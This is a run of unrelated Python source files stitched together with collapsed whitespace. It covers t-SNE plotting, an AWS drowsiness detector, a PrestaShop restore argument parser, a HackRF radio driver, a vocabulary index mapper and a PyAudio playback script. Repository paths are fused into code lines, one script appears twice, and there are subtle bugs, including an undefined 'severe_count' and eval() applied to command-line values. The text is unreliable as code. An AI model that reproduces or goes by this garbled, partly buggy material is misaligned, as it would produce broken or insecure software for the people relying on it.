time.sleep(0.5) run_button.on_click(run) app = pn.Column(run_button, progress.view) app.servable() ``` which will show the progress and reset every 2 clicks. """ import panel as pn STYLE = """ """ pn.Column( pn.pane.Markdown(__doc__), pn.pane.HTML(STYLE), ).servable() def Articles(): articles = [ { 'id':1, 'title':'Article One', 'body':'This is my first article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-29-2018' }, { 'id':2, 'title':'Article Two', 'body':'This is my Second article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-30-2018' }, { 'id':3, 'title':'Article Three', 'body':'This is my Third article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-31-2018' } ] return articles # -*- coding: utf-8 -*- """ Created on Sun Mar 1 15:31:02 2020 @author: jpeeples """ from sklearn.manifold import TSNE #from barbar import Bar import matplotlib.pyplot as plt import matplotlib.cm as colormap from sklearn.preprocessing import MinMaxScaler import numpy as np import torch from matplotlib import offsetbox from Utils.Compute_FDR import Compute_Fisher_Score import pdb def plot_components(data, proj, images=None, ax=None, thumb_frac=0.05, cmap='copper'): # scaler = MinMaxScaler(feature_range=(0,255)) ax = ax or plt.gca() ax.plot(proj[:, 0], proj[:, 1], '.k') if images is not None: min_dist_2 = (thumb_frac * max(proj.max(0) - proj.min(0))) ** 2 shown_images = np.array([2 * proj.max(0)]) for i in range(data.shape[0]): dist = np.sum((proj[i] - shown_images) ** 2, 1) if np.min(dist) < min_dist_2: # don't show points that are too close continue shown_images = np.vstack([shown_images, proj[i]]) # #Rescale images to be 0 to 255 # for channel in range(0,images.shape[1]): # scaler.fit(images[i,channel]) # scaler.fit_transform(images[i,channel]) imagebox = offsetbox.AnnotationBbox( offsetbox.OffsetImage(images[i],zoom=.2, cmap=cmap), proj[i]) ax.add_artist(imagebox) def Generate_TSNE_visual(dataloaders_dict,model,sub_dir,device,class_names, histogram=True,Separate_TSNE=False): # Turn interactive plotting off, don't show plots plt.ioff() #TSNE visual of train data #Get labels and outputs GT_val = np.array(0) indices_train = np.array(0) model.eval() model.to(device) features_extracted = [] saved_imgs = [] for idx, (inputs, classes,index) in enumerate(dataloaders_dict['train']): images = inputs.to(device) labels = classes.to(device, torch.long) indices = index.to(device).cpu().numpy() GT_val = np.concatenate((GT_val, labels.cpu().numpy()),axis = None) indices_train = np.concatenate((indices_train,indices),axis = None) features = model(images) features = torch.flatten(features, start_dim=1) features = features.cpu().detach().numpy() features_extracted.append(features) saved_imgs.append(images.cpu().permute(0,2,3,1).numpy()) features_extracted = np.concatenate(features_extracted,axis=0) saved_imgs = np.concatenate(saved_imgs,axis=0) #Compute FDR scores GT_val = GT_val[1:] indices_train = indices_train[1:] FDR_scores, log_FDR_scores = Compute_Fisher_Score(features_extracted,GT_val) np.savetxt((sub_dir+'train_FDR.txt'),FDR_scores,fmt='%.2E') np.savetxt((sub_dir+'train_log_FDR.txt'),log_FDR_scores,fmt='%.2f') features_embedded = TSNE(n_components=2,verbose=1,init='random',random_state=42).fit_transform(features_extracted) num_feats = features_extracted.shape[1] fig6, ax6 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture 
in range (0, len(class_names)): x = features_embedded[[np.where(GT_val==texture)],0] y = features_embedded[[np.where(GT_val==texture)],1] ax6.scatter(x, y, color = colors[texture,:],label=class_names[texture]) plt.title('TSNE Visualization of Training Data Features') # plt.legend(class_names,loc='lower right') box = ax6.get_position() ax6.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9]) ax6.legend(loc='upper center',bbox_to_anchor=(.5,-.05),fancybox=True,ncol=4) plt.axis('off') fig6.savefig((sub_dir + 'TSNE_Visual_Train_Data.png'), dpi=fig6.dpi) plt.close() #Plot tSNE with images fig9, ax9 = plt.subplots() plot_components(features_extracted,features_embedded,thumb_frac=0.1,images=saved_imgs,cmap=None) # plt.title('TSNE Visualization of Train Data Features with Images') plt.grid('off') plt.axis('off') fig9.savefig((sub_dir + 'TSNE_Visual_Train_Data_Images.png'),dpi=fig9.dpi) plt.close() if (Separate_TSNE): conv_features_embedded = TSNE(n_components=2,verbose=1).fit_transform(features_extracted[:,:num_feats//2]) hist_features_embedded = TSNE(n_components=2,verbose=1).fit_transform(features_extracted[:,num_feats//2:]) GT_val = GT_val[1:] indices_train = indices_train[1:] fig7, ax7 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture in range (0, len(class_names)): x = conv_features_embedded[[np.where(GT_val==texture)],0] y = conv_features_embedded[[np.where(GT_val==texture)],1] plt.scatter(x, y, color = colors[texture,:]) plt.title('TSNE Visualization of Training Data Convolution Features') plt.legend(class_names) fig7.savefig((sub_dir + 'TSNE_Visual_Train_Data_Conv_feats.png'), dpi=fig7.dpi) plt.close() fig10, ax10= plt.subplots() plot_components(features_extracted,conv_features_embedded,images=saved_imgs) # plt.title('TSNE Visualization of Test Data Features with Images') plt.grid('off') plt.axis('off') fig10.savefig((sub_dir + 'TSNE_Visual_Train_Conv_Data_Images.png')) plt.close() fig8, ax8 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture in range (0, len(class_names)): x = hist_features_embedded[[np.where(GT_val==texture)],0] y = hist_features_embedded[[np.where(GT_val==texture)],1] plt.scatter(x, y, color = colors[texture,:]) plt.title('TSNE Visualization of Training Data Histogram Features') plt.legend(class_names) fig8.savefig((sub_dir + 'TSNE_Visual_Train_Data_Hist_feats.png'), dpi=fig8.dpi) fig11, ax11 = plt.subplots() plot_components(features_extracted,hist_features_embedded,images=saved_imgs) # plt.title('TSNE Visualization of Test Data Features with Images') plt.grid('off') plt.axis('off') fig11.savefig((sub_dir + 'TSNE_Visual_Train_Hist_Data_Images.png')) plt.close() # del dataloaders_dict,features_embedded torch.cuda.empty_cache() return FDR_scores, log_FDR_scoreslambda/python/project_drowsy_detector.py import json import boto3 import dlib import cv2 import time from scipy.spatial import distance from imutils import face_utils import imutils import os import numpy as np import time import datetime import websocket import json import requests import base64 try: import thread except ImportError: import _thread as thread import time class webSocket: msg = '' @staticmethod def on_message(ws, message): print('Message ',message) @staticmethod def on_error(ws, error): print('Error ',error) @staticmethod def on_close(ws): print("### closed ###") @staticmethod def on_open(ws): def run(*args): print('Inside Run') ws.send(json.dumps({ "action": "onMessage", 
"message":webSocket.msg})) ws.close() print("thread terminating...") thread.start_new_thread(run, ()) class drowsyDetector: def __init__(self): self.flag = 0 self.frame_check = 15 self.eye_thresh = 0.22 self.yawn_thres = 0.58 self.lStart,self.lEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["left_eye"] self.rStart,self.rEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["right_eye"] self.mStart,self.mEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["mouth"] self.detect = dlib.get_frontal_face_detector() self.predict = dlib.shape_predictor('/home/ec2-user/shapedetectorfile/shape_predictor_68_face_landmarks.dat') #es config self.severe_count = 0 self.recommend_alert = 0 self.region = 'us-east-1' self.service = 'es' self.host = 'https://search-kibana-test-hrgtvqtpirdohmbmrl5rxrfzua.us-east-1.es.amazonaws.com' self.headers = { "Content-Type": "application/json" } def write_frames_to_s3(self,frame,snap_ts,trip_id): s3 = boto3.client('s3') snap_time = str(snap_ts) #.split('.')[0] imageName = f'{snap_time}.jpeg' print('Image Name ',imageName) cv2.imwrite(imageName, frame) local_image = open('./'+imageName, 'rb') s3 = boto3.client('s3') s3.put_object(Bucket="project-frontend-web", Key = f'img/trips/{trip_id}/{imageName}', Body = local_image, ContentType= 'image/jpeg') os.remove(imageName) def ear_mar_graph(self,snap_time,ear,mouthEAR,trip_id,user_email): snap_ts = datetime.datetime.fromtimestamp(snap_time) snap_ts = snap_ts.strftime("%Y-%m-%d"'T'"%H:%M:%S") json_data = {} json_data['ear'] = ear json_data['mar'] = mouthEAR json_data['time'] = snap_ts json_data['trip_id'] = trip_id json_data['user_email'] = user_email url = f'{self.host}/user_email/_doc/' r = requests.post(url, json=json.loads(json.dumps(json_data)), headers=self.headers) def emit_drowsy_signal(self,snap_time,frame,trip_id,user_email): snap_ts = datetime.datetime.fromtimestamp(snap_time) snap_ts = snap_ts.strftime("%Y-%m-%d"'T'"%H:%M:%S") json_data = {} json_data['snap_time'] = snap_ts json_data['trip_id'] = trip_id json_data['user_email'] = user_email url = f'{self.host}/user_email/_doc/' r = requests.post(url, json=json.loads(json.dumps(json_data)), headers=self.headers) string_to_push = f"{trip_id}; {snap_ts}" #{journey_cords[index][0]}; {journey_cords[index][1]}" websocket.enableTrace(False) ws = websocket.WebSocketApp("wss://gddowyfaka.execute-api.us-east-1.amazonaws.com/dev", on_message = webSocket.on_message, on_error = webSocket.on_error, on_close = webSocket.on_close) webSocket.msg = 'Alert; '+str(string_to_push) if(self.severe_count % 3 == 0): print(webSocket.msg) self.write_frames_to_s3(frame,snap_ts,trip_id) ws.on_open = webSocket.on_open ws.run_forever() def eye_aspect_ratio(self,eye): A = distance.euclidean(eye[1], eye[5]) B = distance.euclidean(eye[2], eye[4]) C = distance.euclidean(eye[0], eye[3]) ear = (A + B) / (2.0 * C) return ear def mouth_aspect_ratio(self,m): A = distance.euclidean(m[3],m[9]) B = distance.euclidean(m[0],m[7]) mar = A/B return mar def gencam(self,frames,user_email,trip_id): #res_dict = self.preloaded_es(trip_id,_id) for frame in frames: frame = imutils.resize(frame, width=450) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) subjects = self.detect(gray, 0) for subject in subjects: shape = self.predict(gray, subject) shape = face_utils.shape_to_np(shape) # converting to NumPy Array leftEye = shape[self.lStart:self.lEnd] rightEye = shape[self.rStart:self.rEnd] mouth = shape[self.mStart:self.mEnd] leftEAR = self.eye_aspect_ratio(leftEye) rightEAR = self.eye_aspect_ratio(rightEye) mouthEAR = self.mouth_aspect_ratio(mouth) 
ear = (leftEAR + rightEAR) / 2.0 leftEyeHull = cv2.convexHull(leftEye) rightEyeHull = cv2.convexHull(rightEye) mouthHull = cv2.convexHull(mouth) cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1) cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1) cv2.drawContours(frame,[mouthHull],-1,(0,255,255),1) print('Eye ratio ',ear) print('Mouth Ratio ',mouthEAR) if ear <= self.eye_thresh or mouthEAR >= self.yawn_thres: self.flag += 1 if self.flag >= self.frame_check: cv2.putText(frame, "***********************ALERT!********************", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) cv2.putText(frame, "*******************ALERT!*********************", (10, 325), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) #get the snap time for current frame snap_time = time.time() #print('Recommendedation count ',self.severe_count) if(self.severe_count % 3 == 0): self.flag = 0 #self.recommend_alert += 1 #print('------------------------------------------Alert Released for Recommendedation--------------------------------------------') self.ear_mar_graph(snap_time,ear,mouthEAR,trip_id,user_email) self.emit_drowsy_signal(snap_time,frame,trip_id,user_email) else: #print('-------------------Alert Detected but not send-----------------') if(self.flag % 22 == 0): severe_count += 1 self.ear_mar_graph(snap_time,ear,mouthEAR,trip_id,user_email) self.emit_drowsy_signal(snap_time,frame,trip_id,user_email) #dd = drowsyDetector() #dd.gencam([],sys.argv[1],sys.argv[2]) #email,trip_id osmarvalero100/ps17_restoretools/param.py import os from settings import SITES_RESTORE class Param(): def __help(self): """ Muestra la lista de argumentos a pasar por terminal """ info = """ --help Lista los argumentos disponibles. --sites Lista los sitios configurados. -s Nombre del sitio restaurar. -src Pasar los backups locales de manera explicita {'db':'path', 'code': 'path'}. -rsrc Pasar los backups desde el servidor remoto de backups de manera explicita {'db':'path', 'code': 'path'}. -only Solo restaura el objeto indicado (db, code ó img) úselo solo para backup remoto. -full Asigne valor True para realizar una restauración completa (code, db e img). -szdb Obtiene el backup remoto de base de datos de mayor tamaño creado en las últimas 24 horas. 
""" print(info) def set_params(self, str_params): """ Extrae los parámetros pasados por linea de comando y se asignan a variables de entorno con el nombre de flag Args: str_params (str): Cadena de parametros pasados por terminal """ if len(str_params): for str_param in str_params: if str_param == '--help': self.__help() exit() if str_param == '--sites': for site in SITES_RESTORE.keys(): domain = SITES_RESTORE[site]['LOCAL_SERVER']['SHOP_URL'] print(f' * {site} => {domain}') exit() if '=' in str_param: index_sep = str_param.index('=') flag = str_param[0:index_sep] value = str_param[index_sep+1:len(str_param)] os.environ[flag] = value def getObjects(self): """ Obtiene un listo de objetos a resturara ej: db, code, img Returns: [tuple]: Tupla con objetos a restaurar """ if os.environ.get('-src'): return tuple(eval(os.environ.get('-src')).keys()) elif os.environ.get('-rsrc'): return tuple(eval(os.environ.get('-rsrc')).keys()) else: if os.environ.get('-only'): return (os.environ.get('-only'),) if os.environ.get('-full'): return ('db', 'code', 'img') return ('db', 'code')fietensen/FlappyAI import numpy as np import random def Sigmoid(X): return 1/(1 + np.exp(-X)) class AgentANN: def __init__(self, resolution, child=False): if child: self.hidden1_weights = np.zeros((3, 8)) self.hidden2_weights = np.zeros((8, 4)) self.output_weights = np.zeros((4, 1)) else: self.hidden1_weights = np.random.randn(3, 8) self.hidden2_weights = np.random.randn(8, 4) self.output_weights = np.random.randn(4, 1) def decide(self, screen): hidden1_output = Sigmoid(np.dot(screen, self.hidden1_weights)) hidden2_output = Sigmoid(np.dot(hidden1_output, self.hidden2_weights)) output = Sigmoid(np.dot(hidden2_output, self.output_weights)) return round(output[0]) camkes/parser/stage9.py #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2017, Data61 # Commonwealth Scientific and Industrial Research Organisation (CSIRO) # ABN 41 687 119 230. # # This software may be distributed and modified according to the terms of # the BSD 2-Clause license. Note that NO WARRANTY is provided. # See "LICENSE_BSD2.txt" for details. # # @TAG(DATA61_BSD) # ''' Stage 9 parser. The following parser is designed to accept a stage 8 parser, whose output it consumes. Combine n-1 connections according to the following rule: 1. If an interface is in multiple connections, and in each connection it is on the same end (to or from), all the connections can be combined into a single connection. 2. If an interface is in multiple connections and the condition in 1 does not hold, the spec is invalid. 
''' from __future__ import absolute_import, division, print_function, \ unicode_literals from future.utils import iteritems from itertools import chain from camkes.internal.seven import cmp, filter, map, zip from camkes.ast.objects import Connection, ConnectionEnd from .base import Transformer from .exception import ParseError # track a connection def add_connections(connections): candidates = {} for connection in connections: for i in chain(connection.to_ends, connection.from_ends): if i in candidates: candidates[i].add(connection) else: candidates[i] = {connection} return candidates # yields tuples of the form (conns_to_remove, conn_to_add) where conns_to_remove # is a set of connections to remove from the ast, and # conn_to_add is a single connection to replace them with def consolidate(candidates): multi = [] for (_, i) in iteritems(candidates): # Combine connection sets if any two sets share a connection for j in multi: if i & j: j |= i break else: multi.append(i) # We have now combined all of the multi connection definitions for connections in multi: if len(connections) is 1: continue name = ".".join(sorted([c.name for c in connections])) to_ends = {end for c in connections for end in c.to_ends} from_ends = {end for c in connections for end in c.from_ends} connection_type = None for c in connections: if connection_type is not None: if c.type != connection_type: raise ParseError("Multiple connectors used in connections involving %s. (%s, %s)" % (c.name, connection_type, c.type)) assert c.type == connection_type, "Bad type" else: connection_type = c.type new_connection = Connection(connection_type, name, list(from_ends), list(to_ends)) yield(connections, new_connection) class Parse9(Transformer): def precondition(self, ast_lifted, _): return True def postcondition(self, ast_lifted, _): return True def transform(self, ast_lifted, read): candidates = add_connections(ast_lifted.assembly.connections) for (conns_to_remove, conn_to_add) in consolidate(candidates): for c in conns_to_remove: ast_lifted.assembly.connections.remove(c) ast_lifted.assembly.connections.append(conn_to_add) return ast_lifted, read 10-100 """ Decorators """ # 1 Decorators################################################################## # Have a look at the warnings examples in warnings.py. How would you # go about writing a more general deprectation warning if you have # multiple deprecated functions? Wouldn't it be nice to 'decorate' a function # as 'deprecated' instead of explicitely raising a warning each time? 
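# A sketch of where this is heading, using only the standard functools and
# warnings modules. The name deprecated_warning and the message format are
# illustrative; the rest of this section builds up the same idea step by step.
import functools
import warnings

def deprecated_warning(old_function):
    # Wrap old_function so every call first emits a DeprecationWarning,
    # then delegates to the original function unchanged.
    @functools.wraps(old_function)
    def wrapper(*args, **kwargs):
        warnings.warn("%s is deprecated" % old_function.__name__,
                      DeprecationWarning, stacklevel=2)
        return old_function(*args, **kwargs)
    return wrapper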
# One solution would be a wrapper function, which you apply to your # deprecated functions, eg def wrapper(old_function): print 'do something before' result = old_function() print 'doing something after' return result def deprecated(old_function): print 'A' def wrapper(): print 'deprecated' res = old_function() return res print 'C' return wrapper @deprecated def myfunction(): print 'Myfunction' print 'Calling wrapper explicitely' wrapper(myfunction) print 'Calling myfunction' myfunction() print myfunction # -1 Predefined Decorators ##################################################### # Decorators to be used with methods in classes: # @staticmethod, @classmethod, @abc.abstractmethod, @context.contextmanager # Example code for @classmethod and @abc.abstractmethod import abc class BasePizza(object): __metaclass__ = abc.ABCMeta default_ingredients = ['cheese'] @classmethod @abc.abstractmethod def get_ingredients(cls): """Returns the ingredient list.""" return cls.default_ingredients class DietPizza(BasePizza): def get_ingredients(self): return ['egg'] + super(DietPizza, self).get_ingredients() import numpy as np import time from urh.dev.native.Device import Device from urh.dev.native.lib import hackrf from urh.util.Logger import logger class HackRF(Device): BYTES_PER_SAMPLE = 2 # HackRF device produces 8 bit unsigned IQ data def __init__(self, bw, freq, gain, srate, is_ringbuffer=False): super().__init__(bw, freq, gain, srate, is_ringbuffer) self.success = 0 self.error_not_open = -4242 self._max_bandwidth = 28e6 self._max_frequency = 6e9 self._max_sample_rate = 20e6 self._max_gain = 40 self.error_codes = { 0: "HACKRF_SUCCESS", 1: "HACKRF_TRUE", 1337: "TIMEOUT ERROR", -2: "HACKRF_ERROR_INVALID_PARAM", -5: "HACKRF_ERROR_NOT_FOUND", -6: "HACKRF_ERROR_BUSY", -11: "HACKRF_ERROR_NO_MEM", -1000: "HACKRF_ERROR_LIBUSB", -1001: "HACKRF_ERROR_THREAD", -1002: "HACKRF_ERROR_STREAMING_THREAD_ERR", -1003: "HACKRF_ERROR_STREAMING_STOPPED", -1004: "HACKRF_ERROR_STREAMING_EXIT_CALLED", -4242: "HACKRF NOT OPEN", -9999: "HACKRF_ERROR_OTHER" } # self.__lut = np.zeros(0xffff + 1, dtype=np.complex64) # self.little_endian = False # for i in range(0, 0xffff + 1): # if self.little_endian: # real = (float(np.int8(i & 0xff))) * (1.0 / 128.0) # imag = (float(np.int8(i >> 8))) * (1.0 / 128.0) # else: # real = (float(np.int8(i >> 8))) * (1.0 / 128.0) # imag = (float(np.int8(i & 0xff))) * (1.0 / 128.0) # # self.__lut[i] = complex(real, imag) def reopen(self): if self.is_open: hackrf.reopen() def open(self, init=True): if not self.is_open: if init: ret = hackrf.setup() else: ret = hackrf.open() self.is_open = ret == self.success self.log_retcode(ret, "open") def close(self, exit=True): if self.is_open: logger.info("HackRF: Attempting to close...") time.sleep(0.01) ret = hackrf.close() self.is_open = ret != self.success if self.is_open: logger.error("Failed to close HackRF") else: logger.info("Successfully closed HackRF") self.log_retcode(ret, "close") if exit: self.exit() def exit(self): return hackrf.exit() def start_rx_mode(self): if self.is_open: self.init_recv_buffer() self.set_device_parameters() ret = hackrf.start_rx_mode(self.callback_recv) self.is_receiving = ret == self.success if self.is_receiving: logger.info("HackRF: Starting receiving thread") self._start_readqueue_thread() self.log_retcode(ret, "start_rx_mode") else: self.log_retcode(self.error_not_open, "start_rx_mode") def stop_rx_mode(self, msg): self.is_receiving = False logger.info("HackRF: Stopping RX Mode: "+msg) if hasattr(self, "read_queue_thread") and 
self.read_queue_thread.is_alive(): try: self.read_queue_thread.join(0.001) logger.info("HackRF: Joined read_queue_thread") except RuntimeError: logger.error("HackRF: Could not join read_queue_thread") if self.is_open: logger.info("stopping HackRF rx mode ({0})".format(msg)) logger.warning("closing because stop_rx_mode of HackRF is bugged and will not allow re receive without close") self.close(exit=False) def switch_from_rx2tx(self): # https://github.com/mossmann/hackrf/pull/246/commits/4f9665fb3b43462e39a1592fc34f3dfb50de4a07 self.reopen() def start_tx_mode(self, samples_to_send: np.ndarray = None, repeats=None, resume=False): if self.is_open: self.init_send_parameters(samples_to_send, repeats, resume=resume) retcode = hackrf.start_tx_mode(self.callback_send) if retcode == self.success: self.is_transmitting = True self._start_sendbuffer_thread() else: self.is_transmitting = False else: retcode = self.error_not_open self.log_retcode(retcode, "start_tx_mode") def stop_tx_mode(self, msg): self.is_transmitting = False try: self.send_buffer_reader.close() self.send_buffer.close() except AttributeError: logger.warning("HackRF: Could not close send buffer, because it was not open yet") if self.is_open: logger.info("stopping HackRF tx mode ({0})".format(msg)) logger.info("closing because stop_tx_mode of HackRF is bugged and never returns") self.close(exit=False) def set_device_bandwidth(self, bw): if self.is_open: retcode = hackrf.set_baseband_filter_bandwidth(bw) else: retcode = self.error_not_open self.log_retcode(retcode, "set_bandwidth", bw) def set_device_frequency(self, value): if self.is_open: retcode = hackrf.set_freq(value) else: retcode = self.error_not_open self.log_retcode(retcode, "set_frequency", value) def set_device_gain(self, gain): if self.is_open: hackrf.set_lna_gain(gain) hackrf.set_vga_gain(gain) hackrf.set_txvga_gain(gain) def set_device_sample_rate(self, sample_rate): if self.is_open: retcode = hackrf.set_sample_rate(sample_rate) else: retcode = self.error_not_open self.log_retcode(retcode, "set_sample_rate", sample_rate) def unpack_complex(self, buffer, nvalues: int): result = np.empty(nvalues, dtype=np.complex64) unpacked = np.frombuffer(buffer, dtype=[('r', np.int8), ('i', np.int8)]) result.real = unpacked['r'] / 128.0 result.imag = unpacked['i'] / 128.0 return result def pack_complex(self, complex_samples: np.ndarray): assert complex_samples.dtype == np.complex64 # tostring() is a compatibility (numpy<1.9) alias for tobytes(). Despite its name it returns bytes not strings. 
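        # Viewing complex64 as float32 yields interleaved [re, im, re, im, ...]
        # values; scaling by 128 and truncating to int8 is the inverse of the
        # /128.0 applied in unpack_complex above, producing the signed 8-bit
        # I/Q byte stream written to the send buffer.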
return (128 * complex_samples.view(np.float32)).astype(np.int8).tostring() openkge/index_mapper.py # -*- coding: utf-8 -*- from __future__ import unicode_literals import os import codecs import logging from collections import Counter, defaultdict import torch UNK_TOKEN = '' PAD_TOKEN = '' BOS_TOKEN = '' EOS_TOKEN = '<\s>' PAD, UNK, BOS, EOS = [0, 1, 2, 3] class IndexMapper(object): special_tokens = {PAD_TOKEN:PAD, UNK_TOKEN:UNK} special_tokens_segment = {PAD_TOKEN:PAD, UNK_TOKEN:UNK, BOS_TOKEN:BOS, EOS_TOKEN:EOS} def __init__(self, vocab_file=None, threshold=-1, segment_func=lambda line: line.lower().strip().split(), segment_infix='_token', suffix='.txt', additional_tokens=None, segment=True, insert_start=BOS, insert_end=EOS, ): self.threshold = threshold if additional_tokens is not None: self.special_tokens += additional_tokens self.item2idx = None self.item2segmentidx = None self.token_embedding = None if vocab_file and os.path.isfile(vocab_file): self.load_vocab(vocab_file) self.insert_start = insert_start self.insert_end = insert_end self.segment_func = segment_func self.vocab = None self.segment_vocab = None self.segment_infix = segment_infix self.file_type_suffix = suffix self.segment = segment self._collect_vocab = None self._collect_segment_vocab = None def set_insert_start_and_end(self, insert_start=None, insert_end=None, ): self.insert_start=insert_start self.insert_end=insert_end def update_item2idx(self): item2idx = {item[0]: idx + len(self.special_tokens) for idx, item in enumerate(self.vocab)} for tok,i in self.special_tokens.items(): item2idx[tok] = i self.item2idx = defaultdict(lambda: UNK, item2idx) if self.segment: item2segmentidx = {item[0]: idx + len(self.special_tokens_segment) for idx, item in enumerate(self.segment_vocab)} for tok, i in self.special_tokens_segment.items(): item2segmentidx[tok] = i self.item2segmentidx = defaultdict(lambda: UNK, item2segmentidx) def get_vocab(self, items, append=True,): self.init_vocab(append) for item in items: self.collect_vocab(item) self.finalize_vocab() def init_vocab(self, append=True): if self._collect_vocab is None or not append: self._collect_vocab = Counter() self._collect_segment_vocab = Counter() def collect_vocab(self, item, segment=True): self._collect_vocab[item] += 1 if self.segment and segment: for segm in self.segment_func(item): self._collect_segment_vocab[segm] += 1 def finalize_vocab(self): if self._collect_vocab is not None: self.vocab = [i for i in self._collect_vocab.most_common() if i[1] > self.threshold] if self.segment: self.segment_vocab = [i for i in self._collect_segment_vocab.most_common() if i[1] > self.threshold] self.update_item2idx() self._collect_vocab = None self._collect_segment_vocab = None def save_vocab(self, vocab_filename, map_suffix='_id_map'): if self.vocab is not None: with codecs.open(vocab_filename + map_suffix + self.file_type_suffix, 'w', encoding='UTF-8') as f: f.write("# token\tid\tcount\t\n") for id, key_freq in enumerate(self.vocab): key, freq = key_freq # print(key, id , len(self.special_tokens), freq) f.write("{0}\t{1}\t{2}\n".format(key, id + len(self.special_tokens), freq)) if self.segment: with codecs.open(vocab_filename + self.segment_infix + map_suffix + self.file_type_suffix, 'w', encoding='UTF-8') as f: f.write("# token\tid\tcount\t\n") for id, key_freq in enumerate(self.segment_vocab): key, freq = key_freq f.write("{0}\t{1}\t{2}\n".format(key, id + len(self.special_tokens_segment), freq)) def load_vocab(self, vocab_filename, limit=None, map_suffix='_id_map'): vocab = 
Counter(self.vocab) logging.info("Loading vocab from {}".format(vocab_filename + self.file_type_suffix)) with codecs.open(vocab_filename + map_suffix + self.file_type_suffix, encoding='UTF-8') as f: for line in f: if line.startswith('#'): continue item, id, count = line.split('\t') vocab[item] = int(count) self.vocab = vocab.most_common(limit) if self.segment: segment_vocab = Counter(self.segment_vocab) with codecs.open(vocab_filename + self.segment_infix + map_suffix + self.file_type_suffix, encoding='UTF-8') as f: for line in f: if line.startswith('#'): continue item, id, count = line.split('\t') segment_vocab[item] = int(count) self.segment_vocab = segment_vocab.most_common(limit) self.update_item2idx() def toidx(self, item, return_tensor=False, insert_start=None, insert_end=None, segment=True): if self.segment and segment: segmented_item = self.segment_func(item) item = [item.strip()] mapped_item = [] mapped_item.extend(map(self.item2idx.__getitem__, item)) if self.segment and segment: insert_start = insert_start if insert_start else self.insert_start insert_end = insert_end if insert_end else self.insert_end mapped_segmented_item = [] if insert_start is not None: mapped_segmented_item += [insert_start] mapped_segmented_item.extend(map(self.item2segmentidx.__getitem__, segmented_item)) if insert_end is not None: mapped_segmented_item += [insert_end] if return_tensor: return torch.IntTensor(mapped_item), torch.IntTensor(mapped_segmented_item), else: return mapped_item, mapped_segmented_item else: if return_tensor: return torch.IntTensor(mapped_item), torch.IntTensor(mapped_item) else: return mapped_item, mapped_item def detokenize(self, inputs, delimiter=u' '): return delimiter.join([self.idx2item(idx) for idx in inputs]).encode('utf-8') class IndexMappers: SegmentIndexMapper = IndexMapperimport time import pyaudio import wave import sys import struct CHUNK = 1024 """ https://www.codeproject.com/Articles/501521/How-to-convert-between-most-audio-formats-in-NET """ def stereo_to_mono(data_in): """ byte[] output = new byte[input.Length / 2]; int outputIndex = 0; for (int n = 0; n < input.Length; n+=4) { // copy in the first 16 bit sample output[outputIndex++] = input[n]; output[outputIndex++] = input[n+1]; } """ output = bytearray() for n in range(len(data_in)): if n % 4 == 0: output.append(data_in[n]) output.append(data_in[n + 1]) return bytes(output) def uint8_to_float(data_in): output = bytearray() for n in range(len(data_in)): output.extend(struct.pack('f', data_in[n] / 255.0)) return bytes(output) def uint8_to_int8(data_in): output = bytearray() for n in range(len(data_in)): output.append((data_in[n] - 128) % 256) return bytes(output) def callback(in_data, frame_count, time_info, status): data = wf.readframes(frame_count) print(data) # return uint8_to_float(stereo_to_mono(data)), pyaudio.paContinue return uint8_to_int8(stereo_to_mono(data)), pyaudio.paContinue if len(sys.argv) < 2: print("Plays a wave file.\n\nUsage: %s filename.wav" % sys.argv[0]) sys.exit(-1) wf = wave.open(sys.argv[1], 'rb') p = pyaudio.PyAudio() stream = p.open( # format=p.get_format_from_width(wf.getsampwidth()), # format=pyaudio.paFloat32, format=pyaudio.paInt8, # channels=wf.getnchannels(), channels=1, # rate=wf.getframerate(), rate=44100, output=True, stream_callback=callback) # print(p.get_format_from_width(wf.getsampwidth())) print(pyaudio.paFloat32) # data = wf.readframes(CHUNK) # # while data != '': # stream.write(uint8_to_float(stereo_to_mono(data))) # data = wf.readframes(CHUNK) stream.start_stream() 
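# Note: PyAudio is used here in callback mode. Passing stream_callback=callback to
# p.open() registers the callback, which PyAudio invokes from its own thread whenever
# it needs more frames; the callback must return a (bytes, flag) tuple such as
# (data, pyaudio.paContinue). The main thread therefore only polls stream.is_active()
# and sleeps, as in the loop below. The helpers above are byte-level conversions for
# this particular file: stereo_to_mono keeps the first 16-bit sample of every 4-byte
# stereo frame, and uint8_to_int8 shifts unsigned 8-bit samples by 128 to the signed
# 8-bit range expected by format=pyaudio.paInt8.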
while stream.is_active(): time.sleep(2) stream.stop_stream() stream.close() p.terminate() wf = wave.open(sys.argv[1], 'rb') p = pyaudio.PyAudio() stream = p.open( # format=p.get_format_from_width(wf.getsampwidth()), # format=pyaudio.paFloat32, format=pyaudio.paInt8, # channels=wf.getnchannels(), channels=1, # rate=wf.getframerate(), rate=44100, output=True, stream_callback=callback) # print(p.get_format_from_width(wf.getsampwidth())) print(pyaudio.paFloat32) # data = wf.readframes(CHUNK) # # while data != '': # stream.write(uint8_to_float(stereo_to_mono(data))) # data = wf.readframes(CHUNK) stream.start_stream() while stream.is_active(): time.sleep(2) stream.stop_stream() stream.close() p.terminate() phlippe/P2_Net import torch import torch.nn as nn import torch.nn.functional as F import argparse import numpy as np import math from random import shuffle, random import os import sys import time # Disable matplotlib screen support import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from matplotlib.patches import Rectangle from statistics import mean, median from data import DatasetTemplate, DatasetHandler, debug_level, DATA_GLOVE, DATA_BERT, reconstruct_sentences from model_utils import get_device, get_param_val from unsupervised_models.model_loss import * from vocab import get_id2word_dict, get_UNK_index, get_SOS_index from task import TaskTemplate from scheduler_annealing_KL import create_KLScheduler 